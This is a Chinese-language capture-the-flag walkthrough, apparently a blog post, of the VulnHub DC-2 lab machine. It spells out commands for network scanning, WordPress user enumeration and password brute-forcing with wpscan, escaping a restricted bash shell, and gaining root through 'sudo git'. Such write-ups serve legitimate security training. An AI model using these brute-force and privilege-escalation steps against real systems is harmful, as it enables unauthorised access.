渗透测试靶机练习 DC-2

一、靶机介绍

与之前的DC-1靶机是一个系列可在该网站下载搭建
链接：https://www.vulnhub.com/

二、搭建靶机

直接下载靶机在导入到虚拟机中即可

三、渗透测试获取Flag

1.打开靶机看是都能够正常运行

2.发现Flag

2.1flag1

2.1.1 应为处在同一个局域网中可以使用nmap进行主机发现，进行端口扫描

nmap 10.10.10.0/24
nmap -sV -Pn -p- -O -sS -A 10.10.10.136

发现开放了80端口，直接输入靶机ip进行访问发现输入后直接跳转到dc-2

2.1.2在hosts文件中添加ip和域名

vim /etc/hosts

2.1.3进入页面获取flag1 并收集所需要的信息

通过火狐的插件知道CMS是wordpress

找到flag1
通过flag1的提示可以使用cewl
通过查找资料知道cewl可以用来生成密码字典

cewl -w password.txt http://dc-2

通过目录遍历查一下是否生成字典，cat命令查看内容

ls
cat passsword.txt

2.1.4 wpscan扫描用户

通过直接扫描得到的信息该CMS是wordpress，可以通过wpscan枚举用户名(若不知道如何使用可在网上查阅资料)

 wpscan --url http://dc-2 --enumerate u

经过枚举发现了三个用户名admin,jerry,tom将三个用户名保存在name.txt文件中

2.1.5密码爆破

可以使用wpscan自带的爆破功能进行爆破

wpscan -U name.txt  -P password.txt --url http://dc-2

爆破出两组账号密码
通过ssh尝试远程登录，最终tom成功登陆
使用dirb进行目录扫描
使用爆破的账号和密码进行登录，获得Flag2

2.2 flag3

输入常用命令进行尝试发现是rbash受限

接下来尝试各种常用命令看哪些命令没有被禁止，发现vi可以正常使用

2.2.1 通过vi编辑器绕过shell(没有成功)

vi set shell=/bin/bash
:shell

需要更改PATH环境变量

export -p

查看有哪些PATH是否可写如果可写，可直接更改变量
发现PATH和SHELL是可写命令但是经过尝试返回的信息只是只读变量无法写入

2.2.2 通过执行如下命令进行绕过

 BASH_CMDS[a]=/bin/sh;a  注：把/bin/bash给a变量
 export PATH=$PATH:/bin/    注：将/bin 作为PATH环境变量导出
 export PATH=$PATH:/usr/bin   注：将/usr/bin作为PATH环境变量导出

2.3 Flag4

2.3.1切换到Jerry用户

切换到jerry去查看jerry目录下的文件

cd /home/jerry
ls

发现flag4

2.4 Flag4

提示这并不是最终Flag 提示内容 git通过查阅资料可以进行提权

 sudo git -p help
 !/bin/bash 在最后输入该命令进行提权

找到最后的Flag完成查询

四、总结

在进行DC-2的渗透中提权方面遇到了很多的问题，有很多的东西都不知道卡了好几天，看了很多大佬写的东西才慢慢搞懂，一点点完善自己的知识储备